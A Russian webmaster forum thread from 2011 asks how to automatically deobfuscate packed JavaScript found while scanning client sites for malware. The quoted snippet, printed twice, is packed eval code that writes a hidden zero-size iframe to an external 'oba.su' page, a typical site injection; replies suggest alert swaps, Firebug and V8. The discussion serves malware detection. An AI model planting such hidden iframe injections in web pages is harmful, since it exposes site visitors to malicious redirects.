Реклама на сайте Advertise with us

Анти обфускация кода, как?

Расширенный поиск по форуму
 
Новая тема Новая тема   
Автор
Поиск в теме:



С нами с 24.10.04
Сообщения: 18881
Рейтинг: 9010


Передовик Master-X (16.03.2006) Передовик Master-X (01.04.2006) Передовик Master-X (16.04.2006) Передовик Master-X (01.05.2006) Передовик Master-X (01.11.2006) Ветеран трепа Master-X ()
Ссылка на сообщениеДобавлено: 22/09/11 в 09:54       Ответить с цитатойцитата 

чем на автомате переводить подобный код в читабельный вид?

Код:
<!-- ~ --><Script Language='Javascript'>eval(function(p,a,c,k,e,r){e=function(c){return c.toString(a)};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p= p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('2.7(\'<1 5="9://b.c/e.4?8=3" f="0" 6="0" a="d:g"></1>\')',17,17,'|iframe|document||php|src|height|write|sid|http|style|oba|su|display|go|width|none'.split('|'),0,{}))</script><!-- ~ -->


ну и чтоб универсальный под разные обфускаторы, возможно есть какой-то интерпретатор, но в исходные коды?

0
 

www.phpdevs.com

С нами с 24.10.02
Сообщения: 16633
Рейтинг: 16105


Передовик Master-X (01.09.2005) Передовик Master-X (16.09.2005) Передовик Master-X (01.10.2005) Передовик Master-X (16.08.2006) Передовик Master-X (16.10.2006) Ветеран трепа Master-X ()
Ссылка на сообщениеДобавлено: 22/09/11 в 10:46       Ответить с цитатойцитата 

А где ты такой код нашел ? Вроде есть же пол лису плагины типа firebug , показывающие уже собранный html/js . По крайней мере ранее каким то из этих плагинов и смотрел сгенерированный код.

Пишу на php/mysql/django за вменяемые деньги.
Обращаться в личку.

0
 



С нами с 24.10.04
Сообщения: 18881
Рейтинг: 9010


Передовик Master-X (16.03.2006) Передовик Master-X (01.04.2006) Передовик Master-X (16.04.2006) Передовик Master-X (01.05.2006) Передовик Master-X (01.11.2006) Ветеран трепа Master-X ()
Ссылка на сообщениеДобавлено: 22/09/11 в 10:52       Ответить с цитатойцитата 

Stek писал:
А где ты такой код нашел ? Вроде есть же пол лису плагины типа firebug , показывающие уже собранный html/js . По крайней мере ранее каким то из этих плагинов и смотрел сгенерированный код.


ну вообщем есть пачка сайтов, периодически надо их чекать на наличие вредоносного кода, код выше на одном из сайтов
я что-то отдаленно слышал про firebug и под хромом похожий дебаггер есть
все таки хотелось бы серверную тулзу

0
 



С нами с 05.05.05
Сообщения: 1913
Рейтинг: 1134

Ссылка на сообщениеДобавлено: 22/09/11 в 17:58       Ответить с цитатойцитата 

0
 



С нами с 24.10.04
Сообщения: 18881
Рейтинг: 9010


Передовик Master-X (16.03.2006) Передовик Master-X (01.04.2006) Передовик Master-X (16.04.2006) Передовик Master-X (01.05.2006) Передовик Master-X (01.11.2006) Ветеран трепа Master-X ()
Ссылка на сообщениеДобавлено: 22/09/11 в 19:01       Ответить с цитатойцитата 

freeek писал:
unpacker


не работает, мне нужно универсальное решение
Код: [развернуть]

0
 



С нами с 18.08.04
Сообщения: 6376
Рейтинг: 4430

Ссылка на сообщениеДобавлено: 22/09/11 в 19:03       Ответить с цитатойцитата 

Хех бро ну надо она обфускация чтобы ты не мог его на лету разобрать. вирмейкеры думаешь просто так свой хлеб едят?

0
 



С нами с 16.10.02
Сообщения: 1454
Рейтинг: 1001


Передовик Master-X (16.03.2023) Передовик Master-X (01.04.2023) Передовик Master-X (01.08.2023) Передовик Master-X (16.08.2023) Передовик Master-X (01.10.2023) Ветеран трепа Master-X (16.10.2023)
Ссылка на сообщениеДобавлено: 22/09/11 в 19:12       Ответить с цитатойцитата 

если просто посмотреть, то вот простое решение:
Код:
<!-- ~ --><Script Language='Javascript'>alert(function(p,a,c,k,e,r){e=function(c){return c.toString(a)};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p= p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('2.7(\'<1 5="9://b.c/e.4?8=3" f="0" 6="0" a="d:g"></1>\')',17,17,'|iframe|document||php|src|height|write|sid|http|style|oba|su|display|go|width|none'.split('|'),0,{}))</script><!-- ~ -->

т.е. замени просто eval на alert

0
 



С нами с 18.08.04
Сообщения: 6376
Рейтинг: 4430

Ссылка на сообщениеДобавлено: 22/09/11 в 19:23       Ответить с цитатойцитата 

ну также можно сделать console.log и ловить в файрбаге но это решение для одного раза а не для автоматического декода.
а вообще ерально конечно капай в сторону V8 енджайн запускай там джс получай результат.

0
 

Чингачгук, вождь красноглазых

С нами с 14.05.04
Сообщения: 4744
Рейтинг: 1824

Ссылка на сообщениеДобавлено: 23/09/11 в 16:03       Ответить с цитатойцитата 

ibiz писал:
ну вообщем есть пачка сайтов, периодически надо их чекать на наличие вредоносного кода, код выше на одном из сайтов


Ну вообще-то куда более плодотворный путь - это отсекать любой посторонний JS еще на этапе попадания его на сайт. Там у тебя что - паблик FTP с корнем на вебе, что ли? icon_smile.gif

0
 



С нами с 24.10.04
Сообщения: 18881
Рейтинг: 9010


Передовик Master-X (16.03.2006) Передовик Master-X (01.04.2006) Передовик Master-X (16.04.2006) Передовик Master-X (01.05.2006) Передовик Master-X (01.11.2006) Ветеран трепа Master-X ()
Ссылка на сообщениеДобавлено: 23/09/11 в 17:12       Ответить с цитатойцитата 

Dr.Syshalt писал:
Ну вообще-то куда более плодотворный путь - это отсекать любой посторонний JS еще на этапе попадания его на сайт. Там у тебя что - паблик FTP с корнем на вебе, что ли? icon_smile.gif


тут у меня вебмастера самостоятельно добавляют сайты в систему, и сами не знают о вирусах на их сайтах, проверять вручную 2к сайтов ежедневно не вариант, чекать через сторонние сервисы долго icon_smile.gif
до этого делалася чек главной страницы на наличие JS после </html> (и ручная проверка), некоторые плагины WP туда ставят каунтеры smail101.gif

0
 
Новая тема Новая тема   

Текстовая реклама в форме ответа
Заголовок и до четырех строчек текста
Длина текста до 350 символов
Купить рекламу в этом месте!


Перейти:  



Спонсор раздела Стань спонсором этого раздела!

Реклама на сайте Advertise with us

Опросы

Рецепт новогоднего блюда 2022



Обсудите на форуме обсудить (11)
все опросы »